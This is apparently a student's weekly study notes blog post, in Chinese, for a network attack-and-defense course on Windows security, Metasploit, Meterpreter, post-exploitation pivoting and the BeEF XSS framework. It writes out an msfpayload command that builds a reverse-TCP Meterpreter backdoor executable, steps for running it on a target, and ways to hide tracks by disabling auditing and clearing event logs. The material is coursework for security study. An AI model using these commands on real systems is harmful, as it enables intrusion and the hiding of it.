• 20169221 2016-2017-2 《网络攻防》第七周学习总结


    教材学习内容总结

    第七章 Windows操作系统安全攻防

    Windows操作系统基本框架概述

    windows系统的内核基本模块包括如下
    Windows执行体、Windows内核体、设备驱动程序、硬件抽象层、Windows窗口与图形界面接口内核实现代码。Windows操作系统在用户态的代码模块则包括如下:系统支持进程、环境子系统服务进程、服务进程、用户应用软件、核心子系统DLL。

    Windows操作系统的安全体系结构与机制

    Windows的授权与访问控制机制是基于引用监控器模型,由内核中的SRM模块与用户态的LSASS服务共同来实施。在Windows服务器操作系统中,用户可以执行内建的whoami命令来查看当前用户的访问令牌信息。Windows对于系统中所有需保护的资源都抽象成对象,具体类型包括文件、目录、注册表键值、内核对象、同步对象、私有对象、管道、内存、通信接口等,而对每个对象会关联一个SD安全描述符,对象安全描述符由如下主要属性组成:Owner SID、Group SID、DACL自主访问控制列表、SACL系统审计访问控制列表。
    Windows安全审计机制:系统审计策略在本地安全策略中由系统管理员定义,来确定系统对那些事件进行记录。

    Windows本的安全攻防技术

    Windows消踪灭迹:①关闭审计功能(Windows Resource Kit工具包里的auditpol程序可以让他们轻易地关闭审计功能)②清理事件日志(使用Event Viewer事件查看器来打开、读取和清除这台主机上的事件日志)

    视频学习内容总结

    Metasloit基础使用

    1.启动服务
    kali中使用metasploit需要先开启PostgreSQL数据库和metasploit服务,然后就可以完整利用msf数据库查询exploit记录
    service postgresql start
    service metasploit start
    如果不想每次开机都这样,还可以配置随系统启动。
    update-rc.d postgresql enable
    update-rc.d metasploit enable
    2.metasploit路径
    Kali中msf的路径为 /usr/share/metasploit-framework
    Auxiliary:辅助模块,
    encoders:供msfencode编码工具使用,具体可以使用 msfencode –l
    exploits:攻击模块 每个介绍msf的文章都会提到那个ms08_067_netapi,它就在这个目录下。
    nops:NOP (No Operation or Next Operation) sled,由于IDS/IPS会检查数据包中不规则的数据,所以在某些场合下(比如针对溢出攻击),某些特殊的滑行字符串(NOPS x90x90...)则会因为被拦截而导致攻击失效,所以此时需要修改exploit中的NOPs.nops文件夹下的东西会在payload生成时用到(后面会有介绍)。比如我们打开php的NOPS生成脚本,就会发现它只是返回了指定长度的空格而已。
    payloads:这里面列出的是攻击载荷,也就是攻击成功后执行的代码。比如我们常设置的windows/meterpreter/reverse_tcp就在这个文件夹下。
    Post:后渗透阶段模块,在获得meterpreter的shell之后可以使用的攻击代码。比如常用的hashdump、arp_scanner就在这里。


    3.基本命令
    msfpayload:用来生成payload或者shellcode。
    搜索的时候可以用msfpayload –l |grep “windows” 这样的命令查询。
    -o 选项可以列出payload所需的参数。
    msfencode:msf中的编码器,早期为了编码绕过AV,现在我常用msfpayload与它编码exploit的坏字符串。
    msfconsole:开启metasploit的console,有个重要的参数 –r,加载resources脚本
    4.攻击示例

    • 选择exploit (use exploit/windows/smb/ms08_067_netapi)
    • 选择payload
    • 设置参数 (set RHOST,set LPORT …)
    • 执行攻击

    Meterpreter介绍

    1。Meterpreter是metasploit框架中扩展模块,作为溢出成功以后的攻击载荷使用作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个meterpretershell的链接。
    meterpretershell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等信息。另外meterpreter能够躲避入侵检测系统。在远程主机上隐藏自己,它不改变系统硬盘中的文件,因此HIDS[基于主机的入侵检测系统]很难对它做出响应。此外它在运行的时候系统时间是变化的,所以跟踪它或者终止它对于一个有经验的人也会变得非常困难。最后,meterpreter还可以简化任务创建多个会话。可以来利用这些会话进行渗透。
    2.常用命令:

    • background把当前的会话设置为背景,需要的时候在启用
    • load/use:加载模块
    • Interact:切换一个信道
    • migrate:迁移进程
    • run:执行一个已有模块,输入run后按两下teb,会列出所有的已有脚本。
    • Resource:执行一个已有的rc脚本常用的Meterpreter类型为:payload/windows/meterpreter/reverse_tcp
    • 针对windows操作系统,反向连接shell,只用起来比较稳定。
      3.步骤
      1)生成Meterpreter后门
      msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.75.132 LPORT=2333 R | msfencode -t exe -c 5 > /root/door1.exe

      2)进入所在目录,修改属性:选择“允许以程序执行文件”,这时候也可以做一些免杀
      3)打开msfconsole,加载exploit/multi/handler模块,设置本地主机;然后开始监听:exploit -z -j :
      4)将程序拷贝到目标主机并执行:
      5)后门程序反向连接到msf,msf发起第二次攻击(开始渗透),然后客户端(后门程序)连接到服务端(msf):

    漏洞利用metasploit后渗透测试

    1.查看当前网卡网段信息
    2.添加路由表run autoroute -s 10.0.0.1
    3.开Socks代理 通过使用 auxiliary/sever/socks4a模块,创建一个Socks代理,可以作为浏览器,Sqlmp,Namp等使用。
    4.通过Background和sessions -i可以自由切换进入Session
    5.输入run可以看到Meterpreter上可以做的很多命令
    6.获取内网信息run arp_scanner -r 10.0.0.1/24
    7.也可上传文件,做端口转发后续测试
    8.应用程序/权限维持/Tunnel工具集
    9.端口转发 upload lcx.exe c:

    Kali漏洞利用之BeeF

    对XSS漏洞需要强大框架的支持,如网上的XSS平台。在Kali下,BeeF是一个不逊色于XSS平台的工具。Beef是浏览器攻击框架的简称,是一款专注于浏览器端的渗透测试工具。官网http://beefproject.com/
    1.命令行下启动Beef beef-xss 此时浏览器自动访问此页面:http://127.0.0.1:3000/ui/authentication 使用默认用户名beef与默认密码beef登录:
    初始用户名和密码为:beef和beef

    2.假设被测试主机由于XSS漏洞请求到 http://192.168.11.152:3000/demos/basic.html
    3.HOOK持续的时间为关闭测试页面为止,在此期间,相当于被控制了,可以发送攻击命令,在Commands模块,我们可以完成很多任务:
    4.代理Proxy功能
    选中目标主机,点右键,在菜单中选中Use as Proxy;然后在Rider选项卡中的Forge Request编辑并发送想要发送的内容。
    点击send 拿目标来请求页面
    状态还是waiting命令还在执行

    教材学习中的问题和解决办法

    上周考试错题总结

    • 可以ASCII码和16进制单字节方法输出Hello.java的内容od -tcx1 Hello.java,od -tc -tx1 Hello.java (-b是以八进制输出)
    • John the ripper是老牌密码破解工具,常用于Linux Shadow中账户密码破解
    • Netwox可以产生的数据报文有IPTCPUDP
    • IP地址欺骗和ARP欺骗攻击技术和应用层无关
    • 类Unix和Windows平台下,攻击者可以通过使用原是套接字绕过TCP/IP协议栈的报文封装处理和验证伪造报文。
    • 中断篡改伪造是主动攻击模式
    • snort的使用模式中,需要使用-c参数的是网络入侵检测系统
    • snort的最近本的功能是由数据包嗅探器/解码器实现的
    • 入侵检测最核心的任务是信息分析,下面技术中对未知攻击无效的是误用检测
    • 评估IDS参数中捕获攻击的全部攻击之比为检测率
    • 用到隧道技术的网络安全防御技术是VPN
    • netfifilter/iptables的规则表中,可以进行源IP和端口转换的是NAT表
    • 防火墙技术中工作网络层次是包过滤

    博客评论

    学习进度条

    教材学习 视频学习 博客量(新增/累积) 重要成长
    目标 12章 20篇
    第七周 第七章 《网络攻防》
    第六周 第五六章 《网络攻防》 1/3
    第六周 视频学习 5个kali视频 2/3 密码分析工具与无线安全分析工具

    参考资料

    域渗透——Pass The Hash & Pass The Key
    汽车防护

  • 相关阅读:
    C# 填充客户端提交的值到T对象
    mvc中hangfire全局简单配置
    mvc企业微信开发全局配置
    js获取简单表单对象(1)
    MVC伪静态路由简单搭配
    [转]一些实用的图表Chart制作工具
    【转】SQL Server 数据库内部版本号
    SVN的搭建和使用总结
    解决ext时间插件在谷歌下变宽的BUG
    Hibernate中Session.get()/load()之区别
  • 原文地址:https://www.cnblogs.com/sunxing/p/6699030.html
Copyright © 2020-2023  润新知